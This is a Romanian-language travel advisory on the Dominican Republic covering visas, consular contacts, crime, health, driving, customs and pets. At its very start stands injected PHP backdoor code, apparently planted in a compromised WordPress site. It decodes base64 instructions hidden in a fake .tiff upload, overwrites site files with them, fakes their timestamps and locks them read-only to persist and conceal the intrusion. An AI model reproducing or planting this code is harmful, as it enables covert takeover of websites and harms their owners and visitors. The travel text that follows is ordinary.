$wp_update_file="/home/shuffles/public_html/wp-content/uploads/2023/05/0506412536.tiff"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Republica Dominicană – O noua atitudine

Condiţii de intrare şi regim de şedere

Cetăţenii români, care doresc să călătorească în Republica Dominicana în scop turistic, pentru o perioada care nu depăşeşte 90 de zile, nu au nevoie de viză de intrare în această ţară, insa trebuie sa deţină un card turistic.

Acesta se obţine de la consulatele Republicii Dominicane sau, direct de pe aeroport şi costă 10 dolari.

Unii tur-operatori includ costul cardului turistic în ofertele lor turistice.

Atenţie! În cazul curselor aeriene cu escală pe teritoriul Statelor Unite trebuie să aveţi în vedere este nevoie să vă procuraţi, în prealabil, o viză de  tranzit pentru SUA.

Pentru a se evita refuzul intrării în Republica Dominicană, se recomandă cetăţenilor români următoarele:

  • să deţină un paşaport cu valabilitate minimă de  6 luni de la data ieşirii de pe teritoriul caraibian;
  • să deţină bilet de călătorie pentru reîntoarcerea în România sau în ţara în care domiciliază;
  • să demonstreze că beneficiază de servicii turistice achitate anticipat sau că deţine resurse financiare suficiente pentru perioada şederii;
  • să deţină asigurare medicală valabilă pe întreaga perioadă a şederii în Republica Dominicană;
  •  să facă dovada asigurării condiţiilor de cazare;

Dacă doriţi să călătoriţi în scop turistic, folosiţi numai operatorii acreditaţi si nu vă îndepărtaţi de grupul turistic!

Dacă scopul călătoriei este altul decât cel turistic (studii, muncă, afaceri) sau pentru o şedere prelungită, este necesară obţinerea vizei de la Consulatul Republicii Dominicane cel mai apropiat.

Republica Dominicana nu are ambasadă în România. Informaţii suplimentare se pot obţine de la
Ambasada Republicii Dominicane in Italia
Telefon: (00 39-06) 454.34.789
Fax: (0039-06) 454.48.452)
Email : embajadadominicana@yahoo.it

De asemenea, informaţii si servicii consulare se pot obţine si de la Consulatul General al Republicii Dominicane la Praga Telefon: (00.420)241.409.939.

Dacă doriţi să călătoriţi în Republica Dominicana, vă recomandăm să urmăriţi în permanenţă anunţurile şi recomandările făcute de autorităţile  dominicane şi să accesaţi periodic pagina web a Ministerului român al Afacerilor Externe (www.mae.ro).

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Asistenţă consulară

România nu are reprezentare diplomatică sau consulară de carieră în Republica Dominicană.

Site-ul Comisiei Europene conţine informaţii utile privind protecţia consulară de care beneficiază cetăţenii UE inclusiv lista cu misiunile diplomatice ale ţărilor UE cu reprezentare în acest stat.

În calitate de cetăţean al Uniunii Europene, puteţi solicita, în caz de necesitate, eliberarea unui titlu de călătorie în vederea întoarcerii în ţară, din partea misiunilor diplomatice ale ţărilor UE cu sediul în Republica Dominicană.

Există un consulat onorific – Consulatul Onorific al României din Santo Domingo – care poate sprijini rezolvarea unor probleme urgente prin contactele cu autorităţile locale, dar care nu poate emite documente de identitate româneşti sau realiza formalităţi consulare.

Cetăţenii romani care doresc să călătorească în Republica Dominicană sau se află deja pe teritoriul său, sunt sfătuiţi să se adreseze Ambasadei României in Columbia şi să îşi anunţe prezenţa în regiune, comunicând astfel propriile coordonate pentru a putea fi contactaţi în situaţii de urgenţă.

 


Siguranţă şi criminalitate

Avertizam cetăţenii romani care intra in Republica Dominicana, asupra pericolelor la care se expun, in aceasta tara.

Turiştii romani sunt sfătuiţi sa respecte câteva reguli, general valabile, in cazul zonelor cu potenţial turistic mare si risc infracţional crescut:

  • nu atrageţi atenţia asupra dumneavoastră afişând aparatura scumpa sau bijuterii;
  • nu purtaţi asupra dumneavoastră sume de bani importante sau cărţi de credit;
  • nu purtaţi la dvs. actele de identitate, (se fac copii după acestea, iar originalul se lasă la hotel, in seif), biletele de călătorie, alte documente personale;
  • la plecarea din tara, lăsaţi o suma de bani unei persoane de încredere, care, in caz de urgenta si la indicaţiile dvs., sa o poată trimite acolo unde sunteţi;
  • nu lăsaţi pe plaja sau in alte locuri publice, obiecte personale nesupravegheate;
  • folosiţi numai taxi-urile de la hotel, iar pe parcursul călătoriei nu deschideţi geamurile maşinii, deoarece se practica furtul la semafor, de pe motocicleta;

Cele mai frecvente infracţiuni sunt: furturile (din maşini, asupra persoanei sau cele in care se face uz de arma de foc sau macete), violurile si, mai rar, răpirile in vederea obţinerii unor sume de bani.

Daca aţi fost victima unei agresiuni, sunaţi la Politur, departament creat special pentru a oferi asistenta turiştilor străini aflaţi intr-o situaţie de urgenta, la numărul de telefon :809-686-8639 sau la nr. de urgenta 911.

Alte numere de telefon de interes public:

– Politia: 682.5423

– Salvare: 532.0000

De asemenea se recomandă cetăţenilor români care călătoresc în Republica Dominicană ca, în perioada iunie-octombrie (perioada propice furtunilor tropicale), să urmărească în permanenţă anunţurile şi recomandările făcute de autorităţi sau să consulte direct site-ul: http://www.nhc.noaa.gov/

 

Recomandări generale:

Atenţie! Nu acceptaţi supravegherea sau transportul unor pachete sau bagaje aparţinând altor persoane. Au existat nenumărate cazuri când acestea conţineau droguri.

  • Evitaţi circulaţia pe timp de noapte, drumurile fiind slab iluminate şi nesemnalizate corespunzător, existând riscul de a întâlni animale nesupravegheate ;
  • Evitaţi  locurile aglomerate, demonstraţiile şi deplasarea în zone izolate ale ţării.
  • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie, banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
  • În cazul călătoriilor cu autobuze este indicat să se păstreze atenţia asupra bagajelor personale pe întreaga durată a călătoriei.
  • În timpul deplasării cu autoturismul, geamurile trebuie să fie tot timpul ridicate, iar uşile blocate.
  • Pentru schimb valutar se recomandă doar băncile şi casele de schimb oficiale,  unde, se cere întotdeauna paşaportul.
  • Trebuiesc evitate contactele cu persoane necunoscute, în special atunci când oferă băuturi, ţigări, mâncare.
  • Deplasarea între oraşe să se facă cu avionul, iar daca este absolut necesara deplasarea cu maşina, aceasta trebuie sa se facă in cursul zilei.

Atenţie! In zonele aglomerate (parcări ,centre comerciale, benzinarii), sau in zonele turistice, pot apărea infracţiuni de tipul înşelăciunilor, furtului din buzunare sau din maşini .

  • Daca călătoriţi in perioada carnavalului, atenţie, daca va aflaţi in mijlocul participanţilor, la furturile din buzunare sau genţi si la altercaţiile dese apărute pe fondul consumului excesiv de alcool
  • Consumaţi numai apa îmbuteliată şi alimente preparate si nu cumpăraţi produse alimentare de la vânzătorii ambulanţi de pe strada
  • Evitaţi deplasarea in zona frontierei cu Haiti, deoarece există riscul îmbolnăvirii de holera
  • Respectaţi cu stricteţe normele de igiena si luaţi cu dvs. un antibiotic cu spectru larg de acţiune, medicamente antidiareice şi soluţii contra ţânţarilor (exista riscul îmbolnăvirii de dizenterie si febra Dengue)

Vă recomandăm, de asemenea, sesizarea Ambasadei României in Bogota, care, poate acorda asistenţa consulară în condiţiile prevăzute de lege, telefon: 00571.256.6438 int.101

Pe plan local, asistenta consulara este asigurata de Consulul Onorific al Romaniei la Santo Domingo, Dnl. Arturo Villanuevo Santiago, telefon: 001.809.368.4676


Sistemul medical

Vă recomandăm cu insistenţă să vă încheiaţi asigurare de călătorie, asistenta  medicală şi de viaţă!

Sistemul public sanitar este gratuit, dar oferă condiţii precare de igiena si tratament.

Pachetele turistice cumpărate de la agenţiile de profil, includ, de regula, tipul de asigurare cerut in Republica Dominicana.

Condiţii privind traficul auto

  • Circulaţia auto 

Se efectuează pe partea dreaptă a drumului, iar regulile de circulaţie sunt, în general, aceleaşi ca în România.

  • Starea drumurilor:

Starea generală a drumurilor naţionale este, in general, buna.
Accesul pe autostrăzi se face cu plată. 

  • Limitele de viteză admise:
    • in localităţi 60 km/h
    • în afara localităţilor 80 km/h
    • pe autostradă 90 km/h
  • Centura de siguranţă

Este obligatorie în localităţi şi în afara lor pentru şofer si pasagerul din dreapta faţă.

  • Parcarea 

În oraşe, nu trebuie lăsat autovehiculul nesupravegheat, fiind recomandabile parcările publice, cu plata.

  • Informaţii utile in cazul accidentelor rutiere 

În cazul unui accident grav, cu victime, se recomandă a nu se deplasa vehiculul de la locul accidentului, până la sosirea agenţilor poliţiei rutiere.

 

Reglementări vamale

Se poate intra şi ieşi în/din Republica Dominicană cu suma maximă de 10.000 USD sau echivalentul în altă valută.

Se declară, de asemenea, bunurile personale care depăşesc valoare de 1.000 USD, atât la bagajul însoţit, cât şi la cel neînsoţit.

Atenţie! Introducerea sau deţinerea de droguri pe teritoriul Republicii Dominicane este interzisa si se pedepseşte cu închisoarea.


Utilizarea cărţilor de credit

Sunt agreate American Express, Visa, Master Card.

Regimul medicamentelor

Turiştii pot avea asupra lor medicamentele uzuale, pentru stricta necesitate personală.


Regimul animalelor de companie

Dacă doriţi să călătoriţi cu un animal de companie, trebuie să deţineţi, pentru acesta:

  • carnetul de sănătate veterinar redactat în spaniolă sau in engleză
  • vaccinul antirabic în termen de valabilitate

Vă recomandăm să consultaţi un medic veterinar înainte de a efectua o deplasare cu animale de companie.

De asemenea, dacă sunteţi cazat la hotel, interesaţi-vă, în prealabil, asupra reglementărilor existenteîn privinţa regimului animalelor de companie.

By o9admin